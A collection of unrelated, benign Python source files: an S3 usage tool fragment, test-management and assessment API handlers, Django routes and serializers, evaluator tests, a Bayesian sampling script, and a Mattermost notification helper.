help='Tells the tool what to do: Print space usage, list files or buckets')
namespace = parser.parse_args()
args = vars(namespace)
region = args['region']
unit = args['unit']
session = boto3.session.Session()
s3 = session.resource('s3', region[0])
if args['do'] == 'space':
list_bucket_usage(s3, unit)
elif args['do'] == 'buckets':
list_buckets(s3)
elif args['do'] == 'files':
list_files(s3, unit)
if __name__ == "__main__":
main()
| python |
from django.db.models import Count
from tastypie.resources import ModelResource, ALL_WITH_RELATIONS
from tastypie import http, fields
from tastypie.exceptions import ImmediateHttpResponse
from tastypie.bundle import Bundle
import json
from django.core.exceptions import ValidationError, ObjectDoesNotExist
from django.http import HttpResponse
from .models import Run, RunCaseVersion, RunSuite, Result
from ..mtapi import MTResource, MTApiKeyAuthentication, MTAuthorization
from ..core.api import (ProductVersionResource, ProductResource,
ReportResultsAuthorization, UserResource)
from ..environments.api import EnvironmentResource
from ..environments.models import Environment
from ..library.api import (CaseVersionResource, BaseSelectionResource,
SuiteResource)
from ..library.models import CaseVersion, Suite
from ...view.lists.filters import filter_url
import logging
logger = logging.getLogger(__name__)
class RunSuiteAuthorization(MTAuthorization):
"""Atypically named permission."""
@property
def permission(self):
"""This permission should be checked by is_authorized."""
return "execution.manage_runs"
class RunCaseVersionResource(ModelResource):
"""
RunCaseVersion represents the connection between a run and a caseversion.
It is possible to return a result for each runcaseversion. So the result
will sit as a peer to the caseversion under the runcaseversion.
"""
run = fields.ToOneField(
"moztrap.model.execution.api.RunResource",
"run",
related_name="runcaseversion")
caseversion = fields.ToOneField(CaseVersionResource, "caseversion", full=True)
class Meta:
queryset = RunCaseVersion.objects.all()
list_allowed_methods = ['get']
filtering = {
"run": ALL_WITH_RELATIONS,
"caseversion": ALL_WITH_RELATIONS,
}
fields = ["id", "run"]
class RunResource(ModelResource):
"""
Fetch the test runs for the specified product and version.
It is also possible to create a new testrun, when posted.
"""
productversion = fields.ForeignKey(ProductVersionResource, "productversion")
environments = fields.ToManyField(
EnvironmentResource,
"environments",
full=False,
)
runcaseversions = fields.ToManyField(
RunCaseVersionResource,
"runcaseversions",
)
class Meta:
queryset = Run.objects.all()
list_allowed_methods = ["get", "post"]
fields = [
"id",
"name",
"description",
"status",
"productversion",
"environments",
"runcaseversions",
]
filtering = {
"productversion": ALL_WITH_RELATIONS,
"status": "exact",
}
authentication = MTApiKeyAuthentication()
authorization = ReportResultsAuthorization()
always_return_data = True
def dehydrate(self, bundle):
"""Add some convenience fields to the return JSON."""
pv = bundle.obj.productversion
bundle.data["productversion_name"] = pv.version
bundle.data["product_name"] = pv.product.name
return bundle
def dispatch_detail(self, request, **kwargs):
"""For details, we want the full info on environments for the run """
self.fields["environments"].full = True
return super(RunResource, self).dispatch_detail(request, **kwargs)
def dispatch_list(self, request, **kwargs):
"""For list, we don't want the full info on environments """
self.fields["environments"].full = False
return super(RunResource, self).dispatch_list(request, **kwargs)
def create_response(self, request, data,
response_class=HttpResponse, **response_kwargs):
"""On posting a run, return a url to the MozTrap UI for that new run."""
resp = super(RunResource, self).create_response(
request,
data,
response_class=response_class,
**response_kwargs
)
if isinstance(data, Bundle):
# data will be a bundle if we are creating a new Run. And in that
# case we want to add a URI to viewing this new run result in the UI
full_url = filter_url(
"results_runcaseversions",
Run.objects.get(pk=data.data["id"]),
)
new_content = json.loads(resp.content)
new_content["ui_uri"] = full_url
new_content["resource_uri"] = data.data["resource_uri"]
resp.content = json.dumps(new_content)
# need to set the content type to application/json
resp._headers["content-type"] = ("Content-Type", "application/json; charset=utf-8")
return resp
def obj_create(self, bundle, request=None, **kwargs):
"""Set the created_by field for the run to the request's user"""
bundle = super(RunResource, self).obj_create(bundle=bundle, request=request, **kwargs)
bundle.obj.created_by = request.user
bundle.obj.save()
return bundle
def hydrate_runcaseversions(self, bundle):
"""
Handle the runcaseversion creation during a POST of a new Run.
Tastypie handles the creation of the run itself. But we handle the
RunCaseVersions and Results because we have special handler methods for
setting the statuses which we want to keep DRY.
"""
try:
run = bundle.obj
run.save()
# walk results
for data in bundle.data["runcaseversions"]:
status = data.pop("status")
# find caseversion for case
cv = CaseVersion.objects.get(
productversion=run.productversion,
case=data.pop("case"),
)
# create runcaseversion for this run to caseversion
rcv, created = RunCaseVersion.objects.get_or_create(
run=run,
caseversion=cv,
)
data["user"] = bundle.request.user
data["environment"] = Environment.objects.get(
pk=data["environment"])
# create result via methods on runcaseversion
rcv.get_result_method(status)(**data)
bundle.data["runcaseversions"] = []
return bundle
except KeyError as e:
raise ValidationError(
"bad result object data missing key: {0}".format(e))
except ObjectDoesNotExist as e:
raise ValidationError(e)
class ResultResource(ModelResource):
"""
Endpoint for submitting results for a set of runcaseversions.
This endpoint is write only. The submitted result objects should
be formed like this::
{
"objects": [
{
"case": "1",
"environment": "23",
"run_id": "1",
"status": "passed"
},
{
"case": "14",
"comment": "why u no make sense??",
"environment": "23",
"run_id": "1",
"status": "invalidated"
},
{
"bug": "http://www.deathvalleydogs.com",
"case": "326",
"comment": "why u no pass?",
"environment": "23",
"run_id": "1",
"status": "failed",
"stepnumber": 1
}
]
}
"""
class Meta:
queryset = Result.objects.all()
resource_name = "result"
list_allowed_methods = ["patch"]
authentication = MTApiKeyAuthentication()
authorization = ReportResultsAuthorization()
def obj_create(self, bundle, request=None, **kwargs):
"""
Manually create the proper results objects.
This is necessary because we have special handler methods in
RunCaseVersion for setting the statuses which we want to keep DRY.
"""
data = bundle.data.copy()
try:
status = data.pop("status")
case = data.pop("case")
env = Environment.objects.get(pk=data.get("environment"))
run = data.pop("run_id")
except KeyError as e:
raise ValidationError(
"bad result object data missing key: {0}".format(e))
except Environment.DoesNotExist as e:
raise ValidationError(
"Specified environment does not exist: {0}".format(e))
data["environment"] = env
try:
rcv = RunCaseVersion.objects.get(
run__id=run,
caseversion__case__id=case,
environments=env,
)
except RunCaseVersion.DoesNotExist as e:
raise ValidationError(
"RunCaseVersion not found for run: {0}, case: {1}, environment: {2}:\nError {3}".format(
str(run), str(case), str(env), e))
data["user"] = request.user
bundle.obj = rcv.get_result_method(status)(**data)
return bundle
class RunSuiteResource(MTResource):
"""
Create, Read, Update and Delete capabilities for RunSuite.
Filterable by suite and run fields.
"""
run = fields.ForeignKey(RunResource, 'run')
suite = fields.ForeignKey(SuiteResource, 'suite')
class Meta(MTResource.Meta):
queryset = RunSuite.objects.all()
fields = ["suite", "run", "order", "id"]
filtering = {
"suite": ALL_WITH_RELATIONS,
"run": ALL_WITH_RELATIONS
}
authorization = RunSuiteAuthorization()
@property
def model(self):
return RunSuite
@property
def read_create_fields(self):
"""run and suite are read-only"""
return ["suite", "run"]
def hydrate_suite(self, bundle):
"""suite is read-only on PUT
suite.product must match run.productversion.product on CREATE
"""
# CREATE
if bundle.request.META['REQUEST_METHOD'] == 'POST':
suite_id = self._id_from_uri(bundle.data['suite'])
suite = Suite.objects.get(id=suite_id)
run_id = self._id_from_uri(bundle.data['run'])
run = Run.objects.get(id=run_id)
if suite.product.id != run.productversion.product.id:
error_message = str(
"suite's product must match run's product."
)
logger.error(
"\n".join([error_message, "suite prod: %s, run prod: %s"]),
suite.product.id, run.productversion.product.id)
raise ImmediateHttpResponse(
response=http.HttpBadRequest(error_message))
return bundle
class SuiteSelectionResource(BaseSelectionResource):
"""
Specialty end-point for an AJAX call from the multi-select widget
for selecting suites.
"""
product = fields.ForeignKey(ProductResource, "product")
runs = fields.ToManyField(RunResource, "runs")
created_by = fields.ForeignKey(
UserResource, "created_by", full=True, null=True)
class Meta:
queryset = Suite.objects.all().select_related(
"created_by",
).annotate(case_count=Count("cases"))
list_allowed_methods = ['get']
fields = ["id", "name", "created_by"]
filtering = {
"product": ALL_WITH_RELATIONS,
"runs": ALL_WITH_RELATIONS,
"created_by": ALL_WITH_RELATIONS,
}
ordering = ["runs"]
def dehydrate(self, bundle):
"""Add some convenience fields to the return JSON."""
suite = bundle.obj
bundle.data["suite_id"] = unicode(suite.id)
bundle.data["case_count"] = suite.case_count
bundle.data["filter_cases"] = filter_url("manage_cases", suite)
return bundle
| python |
"""
Copyright 2017 Balwinder Sodhi
Licenced under MIT Licence as available here:
https://opensource.org/licenses/MIT
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN
THE SOFTWARE.
Created on Mar 3, 2017
@author: Balwinder Sodhi
"""
from common import *
from entities import *
import logging
class AssessmentHandler(BaseHandler):
def getAssessmentsTakenByUser(self):
ua_list = AssessmentSubmissionDto.query(AssessmentSubmissionDto.submittedBy
== self.get_current_user_key()).fetch()
data = [{"submissionId": x.key.id(), "submittedOn": x.submittedOn,
"draft": x.draft} for x in ua_list]
self.send_json_response(Const.STATUS_OK, data)
def getPortfolio(self):
a = [p.to_dict_with_id("assessId") for p in
AssessmentDto.query(AssessmentDto.owner == self.get_current_user_key()).fetch()]
q = [p.to_dict_with_id("questionId") for p in
QuestionDto.query(QuestionDto.owner == self.get_current_user_key()).fetch()]
t = [p.to_dict_with_id("trailId") for p in
TrailDto.query(TrailDto.owner == self.get_current_user_key()).fetch()]
p = dict()
p['trails'] = t
p['authoredAssessments'] = a
p['questionBank'] = q
p['content'] = [] # TODO Remove
self.send_json_response(Const.STATUS_OK, p)
def getQuestion(self):
q_id = self.request.params["qid"]
q = QuestionDto.get_by_id(long(q_id))
if q:
self.send_json_response(Const.STATUS_OK, q.to_dict_with_id("questionId"))
else:
self.send_json_response(Const.STATUS_ERROR, "Could not find the requested information.")
def saveQuestion(self):
qf = json.loads(self.request.body)
qid = qf.get("questionId")
if qid:
q = QuestionDto.get_by_id(int(qid))
if q.owner == self.get_current_user_key():
q.populate_from_dict(qf)
q.put()
else:
raise ValueError("Cannot save entity not owned by this user.")
else:
q = QuestionDto(owner=self.get_current_user_key())
q.populate_from_dict(qf)
q.put()
self.send_json_response(Const.STATUS_OK, q.to_dict_with_id("questionId"))
def getAssessmentSubmission(self, sub_key=None):
if sub_key:
asub = sub_key.get()
sid = asub.key.id()
else:
sid = self.request.params["id"]
asub = AssessmentSubmissionDto.get_by_id(long(sid))
if asub:
ta = asub.traiAssessment.get()
else:
raise ValueError("Submission record not found.", sid)
# Fetch the assessment
a_dict = self._fetch_assessment(ta.assess.id(), True)
# Mark the selected answers in assessment as per saved submission
if a_dict:
a_dict["submissionId"] = sid
max_points = 0
for q_dict in a_dict["questions"]:
max_points += q_dict["points"]
# One question may have one or more selected responses
res_list = [x for x in asub.responses if x.questionId.id() == q_dict["questionId"]]
for res in res_list:
# Expected only one match here
if q_dict['type'] != 'FTXT':
aopt_dict = [x_dict for x_dict in q_dict['answerOptions']
if x_dict['answer'] == res.answer]
if aopt_dict: aopt_dict[0]["marked"] = True
else:
# Free text answers have a single answerOptions object
q_dict['answerOptions'][0]['response'] = res.answer
# Include the score
a_dict["score"] = str(asub.score)
a_dict["maxPoints"] = max_points
a_dict["draft"] = asub.draft
self.send_json_response(Const.STATUS_OK, a_dict)
else:
self.send_json_response(Const.STATUS_ERROR, "Record not found!")
def getAssessmentForTaking(self):
if "id" not in self.request.params:
self.send_json_response(Const.STATUS_ERROR, "Missing required params.")
return
a_id = self.request.params["id"]
# First check for an existing in-progress submission
ta = TrailAssessmentDto.query(TrailAssessmentDto.assess ==
ndb.Key(AssessmentDto, long(a_id))).fetch(keys_only=True)
if ta:
sub_keys = AssessmentSubmissionDto.query(
AssessmentSubmissionDto.traiAssessment == ta[0],
AssessmentSubmissionDto.submittedBy == self.get_current_user_key()
).fetch(keys_only=True)
# Found an existing submission
if sub_keys:
logging.info(">>>>>> Found existing submission. ID: %s", sub_keys)
# self.redirect("/#/EditSubmission/%d" % sub_keys[0].id())
self.getAssessmentSubmission(sub_keys[0])
else:
logging.info(">>>>>> Did not find any existing submission. ID: %s", ta)
self.getAssessment(for_taking=True)
def saveAssessmentResponse(self):
ar_dict = self.load_json_request()
# Fix the key properties
for r in ar_dict["responses"]:
r["questionId"] = ndb.Key(QuestionDto, long(r["questionId"]))
if "submissionId" in ar_dict:
sub = AssessmentSubmissionDto.get_by_id(long(ar_dict["submissionId"]))
else:
aid = ar_dict["assessId"]
ta_list = TrailAssessmentDto.query().\
filter(TrailAssessmentDto.assess ==
ndb.Key(AssessmentDto, long(aid))
).fetch(keys_only=True)
if not ta_list:
raise ValueError("Trail assessment record not found for assessment ID %s" % aid)
sub = AssessmentSubmissionDto(traiAssessment = ta_list[0])
sub.populate_from_dict(ar_dict)
sub.submittedBy = self.get_current_user_key()
sub.put()
self.send_json_response(Const.STATUS_OK, sub.to_dict_with_id("submissionId"))
def getAssessmentResult(self):
sid = self.request.params["id"]
sub = AssessmentSubmissionDto.get_by_id(long(sid))
if sub:
# if not sub.draft:
# self.send_json_response(Const.STATUS_ERROR, "Already submitted!")
# return
sub.draft = False
# Calculate score
ta = sub.traiAssessment.get()
res_list = sub.responses
asmt = ta.assess.get()
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == ta.assess).fetch()
# Reset the score
sub.score = 0
for aq in aq_list:
q = aq.assessQtn.get()
# Expected correct answers list
ca_list = [ao.answer for ao in q.answerOptions if ao.correct]
# Submitted answers list
qr_list = [r.answer for r in res_list if r.questionId == aq.assessQtn]
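                # Note: list equality is order-sensitive, so full credit requires
                # the submitted answers to match the correct answers exactly and
                # in the same stored order.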
if ca_list == qr_list:
sub.score += aq.points
else:
sub.score += asmt.pointsForWrongAns
# Persist in datastore
sub_key = sub.put()
self.getAssessmentSubmission(sub_key=sub_key)
else:
self.send_json_response(Const.STATUS_ERROR, "Data not found.")
def getAssessment(self, for_taking=False):
aid = self.request.params["id"]
a_dict = self._fetch_assessment(aid, for_taking)
if a_dict:
self.send_json_response(Const.STATUS_OK, a_dict)
else:
self.send_json_response(Const.STATUS_ERROR, "Could not find the requested information.")
def _fetch_assessment(self, aid, for_taking):
a = AssessmentDto.get_by_id(long(aid))
if a:
a_dict = a.to_dict_with_id("assessId")
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == a.key).fetch()
if aq_list:
q_pts = {}
keys = []
for aq in aq_list:
q_pts[aq.assessQtn.id()] = aq.points
keys.append(ndb.Key(QuestionDto, aq.assessQtn.id()))
q_list = ndb.get_multi(keys)
qdict_list = [x.to_dict_with_id("questionId") for x in q_list]
for q in qdict_list:
q["points"] = q_pts[q["questionId"]]
a_dict["questions"] = qdict_list
# Clear the correct flags on answers
if for_taking:
for qd in a_dict["questions"]:
for ao in qd['answerOptions']:
ao['correct'] = None
if qd['type'] == 'FTXT':
ao['answer'] = None
return a_dict
def lookupAssessments(self):
# TODO: Minimize information to be sent
qry = self.request.params["q"]
a_list = AssessmentDto.query(AssessmentDto.owner == self.get_current_user_key()).fetch()
f = [a.to_dict_with_id("assessId") for a in a_list if qry.lower() in a.title.lower()]
self.send_json_response(Const.STATUS_OK, f)
def saveAssessment(self):
asmt = self.load_json_request()
if "assessId" in asmt:
a = AssessmentDto.get_by_id(int(asmt["assessId"]))
logging.debug("Loaded assessment from DB.")
else:
a = AssessmentDto()
logging.debug("Creating new assessment.")
a.populate_from_dict(asmt)
a.owner = self.get_current_user_key()
a_key = a.put()
aq_list = AssessmentQuestionDto.query(
AssessmentQuestionDto.assess == a_key).fetch()
if aq_list:
ndb.delete_multi([x.key for x in aq_list])
logging.debug("Cleared old AQs.")
for aq in asmt["questions"]:
q = AssessmentQuestionDto()
q.assessQtn = ndb.Key(QuestionDto, aq["questionId"])
q.assess = a_key
q.points = aq["points"]
q.put()
a_dict = a.to_dict_with_id("assessId")
a_dict["questions"] = asmt["questions"]
self.send_json_response(Const.STATUS_OK, a_dict)
| python |
#
# Sample: Gamut clamping
#
from lcms import *
Lab = cmsCIELab(80, -200, 50)
print "Original", Lab
#
# Desaturates color to bring it into gamut.
# The gamut boundaries are specified as:
# -120 <= a <= 120
# -130 <= b <= 130
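# Note: cmsClampLab modifies Lab in place.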
cmsClampLab(Lab, 120, -120, 130, -130)
print "Constrained", Lab
| python |
from django.urls import path
from . import views
urlpatterns = [
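    # Each object type (numbers, trunks, UC clusters, device pools) exposes the
    # same route set: list, detail, add, import, edit, bulk edit, delete, bulk delete.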
path("numbers", views.NumberListView.as_view(), name="number_list_view"),
path("numbers/<int:pk>/", views.NumberView.as_view(), name="number_view"),
path("numbers/add_number/", views.NumberEditView.as_view(), name="add_number"),
path('numbers/import_numbers/', views.NumberBulkImportView.as_view(), name='import_numbers'),
path("numbers/<int:pk>/edit/", views.NumberEditView.as_view(), name="number_edit"),
path("numbers/number_bulk_edit", views.NumberBulkEditView.as_view(), name="number_bulk_edit"),
path("numbers/<int:pk>/delete/", views.NumberDeleteView.as_view(), name="number_delete"),
path("numbers/number_bulk_delete", views.NumberBulkDeleteView.as_view(), name="number_bulk_delete"),
path("trunks", views.TrunkListView.as_view(), name="trunk_list_view"),
path("trunks/<int:pk>/", views.TrunkView.as_view(), name="trunk_view"),
path("trunks/add_trunk/", views.TrunkEditView.as_view(), name="add_trunk"),
path('trunks/import_trunks/', views.TrunkBulkImportView.as_view(), name='import_trunks'),
path("trunks/<int:pk>/edit/", views.TrunkEditView.as_view(), name="trunk_edit"),
path("trunks/trunk_bulk_edit", views.TrunkBulkEditView.as_view(), name="trunk_bulk_edit"),
path("trunks/<int:pk>/delete/", views.TrunkDeleteView.as_view(), name="trunk_delete"),
path("trunks/trunk_bulk_delete", views.TrunkBulkDeleteView.as_view(), name="trunk_bulk_delete"),
path("UCClusters", views.UCClusterListView.as_view(), name="uccluster_list_view"),
path("UCClusters/<int:pk>/", views.UCClusterView.as_view(), name="uccluster_view"),
path("UCClusters/add_uccluster/", views.UCClusterEditView.as_view(), name="add_uccluster"),
path('UCClusters/import_ucclusters/', views.UCClusterBulkImportView.as_view(), name='import_ucclusters'),
path("UCClusters/<int:pk>/edit/", views.UCClusterEditView.as_view(), name="uccluster_edit"),
path("UCClusters/uccluster_bulk_edit", views.UCClusterBulkEditView.as_view(), name="uccluster_bulk_edit"),
path("UCClusters/<int:pk>/delete/", views.UCClusterDeleteView.as_view(), name="uccluster_delete"),
path("UCClusters/uccluster_bulk_delete", views.UCClusterBulkDeleteView.as_view(), name="uccluster_bulk_delete"),
path("devicepools", views.DevicePoolListView.as_view(), name="devicepool_list_view"),
path("devicepools/<int:pk>/", views.DevicePoolView.as_view(), name="devicepool_view"),
path("devicepools/add_devicepool/", views.DevicePoolEditView.as_view(), name="add_devicepool"),
path('devicepools/import_devicepools/', views.DevicePoolBulkImportView.as_view(), name='import_devicepools'),
path("devicepools/<int:pk>/edit/", views.DevicePoolEditView.as_view(), name="devicepool_edit"),
path("devicepools/devicepool_bulk_edit", views.DevicePoolBulkEditView.as_view(), name="devicepool_bulk_edit"),
path("devicepools/<int:pk>/delete/", views.DevicePoolDeleteView.as_view(), name="devicepool_delete"),
path("devicepools/devicepool_bulk_delete", views.DevicePoolBulkDeleteView.as_view(), name="devicepool_bulk_delete"),
]
| python |
import re
import pytest
from ratus import Evaluator, __version__
from ratus.execer import Executor, ExecutorError
from ratus.parse import (
BinaryOp,
BinaryOpType,
Float,
Function,
Integer,
Parser,
ParserError,
String,
UnaryOp,
UnaryOpType,
)
from ratus.token import Token, Tokeniser, TokenLiteral, TokenType
def test_version():
assert __version__ == "0.0.1"
@pytest.mark.parametrize(
("source", "expected", "injected_functions"),
(
pytest.param("1 + 1", 2, None, id="addition"),
pytest.param("1 - 1", 0, None, id="subtraction"),
pytest.param("1 + 3 * 2", 7, None, id="precedence"),
pytest.param("2.0", 2.0, None, id="float_literal"),
pytest.param('"test"', "test", None, id="string_literal"),
pytest.param("if(1 > 2, 10, 5)", 5, None, id="false_conditional"),
pytest.param("if(1<2, 10, 5)", 10, None, id="true_conditional"),
pytest.param("if(if(1<2, 0, 1), 10, 5)", 5, None, id="nested_conditional"),
pytest.param("2 + 3 * 2", 8, None, id="bodmas"),
pytest.param("3 * 2 + 2", 8, None, id="computation_ordering"),
pytest.param("1 > 2", False, None, id="greater_than"),
pytest.param("1 = 1", True, None, id="equals"),
pytest.param("1 != 2", True, None, id="not_equals"),
pytest.param(
"lookup(12345, 'PG')",
10,
{"lookup": lambda x, y: 10},
id="injected_function",
),
pytest.param(
"if(lookup(12345, 'PG') = 10, 5, 4)",
5,
{"lookup": lambda x, y: 10},
id="injected_function_in_conditional",
),
pytest.param(
"add(1, 2)",
3,
{"add": lambda x, y: x + y},
id="function_call_in_computation",
),
),
)
def test_eval(source, expected, injected_functions):
evaluator = Evaluator(injected_functions)
assert evaluator.evaluate(source) == expected
@pytest.mark.parametrize(
("source", "injected_functions", "error_msg"),
(("test(1, 2)", None, "Function 'test' is not defined"),),
)
def test_eval_error(source, injected_functions, error_msg):
evaluator = Evaluator(injected_functions)
with pytest.raises(ExecutorError, match=error_msg):
evaluator.evaluate(source)
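# Usage sketch (mirrors the Evaluator API exercised by the tests above):
#   ev = Evaluator({"double": lambda x: x * 2})
#   ev.evaluate("double(2) + 1")  # -> 5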
| python |
from hilbert import main
main()
| python |
from rest_framework import serializers
from attendance.models import Attendance, AttendanceBlock, Session
class SessionSerializer(serializers.ModelSerializer):
subject = serializers.SerializerMethodField()
class Meta:
model = Session
fields = [
"subject",
"start",
"end",
"did_attend",
]
def get_subject(self, obj):
return obj.subject.name
class AttendanceSerializer(serializers.ModelSerializer):
sessions = SessionSerializer(many=True)
class Meta:
model = Attendance
fields = [
"date",
"present",
"absent",
"total",
"sessions",
]
class AttendanceBlockSerializer(serializers.ModelSerializer):
attendance = AttendanceSerializer(many=True)
semester = serializers.SerializerMethodField()
class Meta:
model = AttendanceBlock
fields = [
"semester",
"link",
"total",
"present",
"absent",
"percent",
"updated_at",
"attendance",
]
def get_semester(self, obj):
return obj.semester.semester
| python |
from __future__ import division
import numpy as np
import matplotlib.pyplot as plt
import scipy.optimize as opt
import scipy.stats as st
from math import exp, copysign, log, sqrt, pi
import sys
sys.path.append('..')
from rto_l1 import *
# ground truth parameter
thetatruth = np.array([0.5, 1.0, 0, 0.1, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, -0.3, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0, 0.0])
N_modes = int((len(thetatruth)-1)/2)
# weight functions to penalize high Fourier modes
#weights_cos = np.ones((N_modes,)) # no penalization
weights_cos = 1/np.arange(1, N_modes+1)
#weights_sin = np.ones((N_modes,)) # no penalization
weights_sin = 1/np.arange(1, N_modes+1)
# forward function and Jacobian
def f_fnc(theta, xs):
N_modes = int((len(theta)-1)/2)
temp = theta[0]
for k in range(N_modes):
temp += theta[k+1] * weights_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp += theta[k+N_modes+1] * weights_sin[k]*np.sin((k+1)*xs)
return temp
def Jf_fnc(theta, xs):
N_modes = int((len(theta)-1)/2)
temp = np.zeros((len(xs),2*N_modes+1))
temp[:, 0] = np.ones((len(xs),))
for k in range(N_modes):
temp[:,k+1] = weights_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp[:, k+N_modes+1] = weights_sin[k]*np.sin((k+1)*xs)
return temp
# observation positions
xObs = np.concatenate((np.array([0, 0.2, 0.8, pi/2, 1.7, 1.8, 2.4, pi]), np.random.uniform(2, 3, (20,))), axis=0)
N = len(xObs)
# forward function for fixed observation positions
def f(theta):
return f_fnc(theta, xObs)
def Jf(theta):
return Jf_fnc(theta, xObs)
# observational noise standard deviation
sigma = 0.05
# generate data
y = f_fnc(thetatruth, xObs) + np.random.normal(0, sigma, (len(xObs),))
# Laplace prior scale gamma (std = sqrt(2)*gamma)
gamma = 0.1
lam = 1/gamma
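# resf (the augmented residual used below) is assumed to be provided by the
# wildcard import from rto_l1 above.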
def cost(theta, y_aug):
r = resf(theta, y_aug)
return 0.5*np.dot(r.T, r)
# starting point for optimization
u0 = np.random.normal(0, gamma, thetatruth.shape)
# RTO sampling
N_samples = 100
lambdas = lam*np.ones((2*N_modes+1,))
res = rto_l1(f, Jf, y, sigma, lambdas, u0, N_samples)
# extract data
samples_plain = res["samples_plain"]
samples_corrected = res["samples_corrected"]
thetaMAP = res["thetaMAP"]
#plot results
xx = np.arange(0, pi, 0.01)
yy = f_fnc(thetatruth, xx)
plt.figure(1); plt.clf();plt.ion()
for n in range(17):
plt.plot(xx, f_fnc(samples_corrected[np.random.randint(N_samples), :], xx), '0.8')
plt.plot(xx, f_fnc(thetaMAP, xx), 'k')
plt.plot(xx, f_fnc(thetatruth, xx), 'g')
plt.plot(xx, yy, 'g')
plt.plot(xObs, y, 'r.', markersize=10)
for n, pos in enumerate(xObs):
plt.plot(np.array([pos, pos]), np.array([y[n]-2*sigma, y[n]+2*sigma]), 'r', linewidth=2)
plt.figure(2);plt.clf()
for n in range(17):
plt.plot(samples_corrected[np.random.randint(N_samples), :], '0.8', marker=".")
plt.plot(thetaMAP.flatten(), '.k-')
plt.plot(thetatruth.flatten(), '.g-')
plt.show()
"""np.random.seed(1992)
xs_obs = np.concatenate((np.array([0, 0.2, 0.8, pi/2, 1.7, 1.8, 2.4, pi]), np.random.uniform(4, 2*pi, (30,))), axis=0)
N = len(xs_obs)
sigma = 0.2
thetaTruth = np.array([0.5, 1.0, 0, 0.1, 0, 0, 0, 0, -0.3, 0, 0, 0, 0, 0, 0])
N_modes = int((len(thetaTruth)-1)/2)
coeffs_cos = 1/np.arange(1, N_modes+1)#np.ones((N_modes,))
coeffs_sin = 1/np.arange(1, N_modes+1)#np.ones((N_modes,))
def f_fnc(theta, xs):
temp = theta[0]
N_modes = int((len(theta)-1)/2)
for k in range(N_modes):
temp += theta[k+1] * coeffs_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp += theta[k+N_modes+1] * coeffs_sin[k]*np.sin((k+1)*xs)
return temp
def Jf_fnc(theta, xs):
temp = np.zeros((len(xs),2*N_modes+1))
temp[:, 0] = np.ones((len(xs),))
for k in range(N_modes):
temp[:, k+1] = coeffs_cos[k]*np.cos((k+1)*xs)
for k in range(N_modes):
temp[:, k+N_modes+1] = coeffs_sin[k]*np.sin((k+1)*xs)
return temp
# variants with fixed x in observation points
f = lambda theta: f_fnc(theta, xs_obs)
Jf = lambda theta: Jf_fnc(theta, xs_obs)
xx = np.arange(0, 2*pi, 0.01)
yy = f_fnc(thetaTruth, xx)
y = f_fnc(thetaTruth, xs_obs) + np.random.normal(0, sigma, (len(xs_obs),))
lam = 3
def norm1(theta, lam_val):
return lam_val*np.sum(np.abs(theta))
def FncL1(theta, y, lam_val):
return Misfit(theta, y) + norm1(theta, lam_val)
N_iter = 300
tau = 0.002
val = np.zeros((N_iter,))
thetaOpt = np.zeros((2*N_modes+1,))
# find MAP estimator
misfit = lambda theta: f(theta)-y
def Phi_fnc(theta):
m = misfit(theta)
return 1/(2*sigma**2)*np.dot(m.T, m)
def DPhi_fnc(theta):
return np.dot(Jf(theta).T, misfit(theta))/sigma**2
I_fnc = lambda theta: Phi_fnc(theta) + norm1(theta, lam)
res = FISTA(thetaOpt, I_fnc, Phi_fnc, DPhi_fnc, 2*sigma**2*lam, alpha0=10, eta=0.5, N_iter=500, c=1.0, showDetails=True)
thetaOpt = np.copy(res["sol"])
plt.figure(2)
plt.title("FISTA")
plt.plot(res["Is"])
lambdas = lam*np.ones((2*N_modes+1,))
u0 = np.zeros((2*N_modes+1,))
N_samples = 250
res_rto = rto_l1(f, Jf, y, sigma, lambdas, u0, N_samples)
thetaMAP, samples = res_rto["thetaMAP"], res_rto["samples_corrected"]
print("thetaTruth: I = " + str(I_fnc(thetaTruth)) + " = " + str(Phi_fnc(thetaTruth)) + " (misfit) + " + str(norm1(thetaTruth, lam)) + " (norm)")
print("thetaMAP(sampling): I = " + str(I_fnc(thetaMAP)) + " = " + str(Phi_fnc(thetaMAP)) + " (misfit) + " + str(norm1(thetaMAP, lam)) + " (norm)")
print("thetaOpt(FISTA): I = " + str(I_fnc(thetaOpt)) + " = " + str(Phi_fnc(thetaOpt)) + " (misfit) + " + str(norm1(thetaOpt, lam)) + " (norm)")
plt.figure(3);
for n in range(17):
plt.plot(samples[np.random.randint(N_samples), :], '0.8', marker=".")
plt.plot(thetaMAP, '.k-', label="th_MAP (from sampling)")
plt.plot(thetaTruth, '.g-', label="th_true")
plt.plot(thetaOpt, '.b-', label="th_OPT (from FISTA)")
plt.legend()
plt.figure(1);plt.ion()
plt.plot(xs_obs, y, 'r.', markersize=10, label="obs")
plt.plot(xx, f_fnc(thetaTruth, xx), 'g', label="th_true")
for n in range(17):
plt.plot(xx, f_fnc(samples[np.random.randint(N_samples), :], xx), '0.8')
plt.plot(xx, f_fnc(thetaMAP, xx), 'k', label="th_MAP (from sampling)")
plt.plot(xx, yy, 'g')
plt.plot(xs_obs, y, 'r.', markersize=10)
plt.plot(xx, f_fnc(thetaOpt, xx), 'b', label="th_OPT (from FISTA)")
plt.legend()
plt.show()
"""
| python |
import requests
import json
def send(text, path):
requests.post('https://meeting.ssafy.com/hooks/k13xxxszfp8z8ewir4qndiw63c',
data=json.dumps({"attachments": [{
"color": "#FF8000",
"text": str(text),
"author_name": "django",
"author_icon": "http://www.mattermost.org/wp-content/uploads/2016/04/icon_WS.png",
"title": path,
}]}),
headers={'Content-Type': 'application/json'}
)
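# Example (illustrative message and path):
#   send("Deployment finished", "/api/deploy")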
| python |
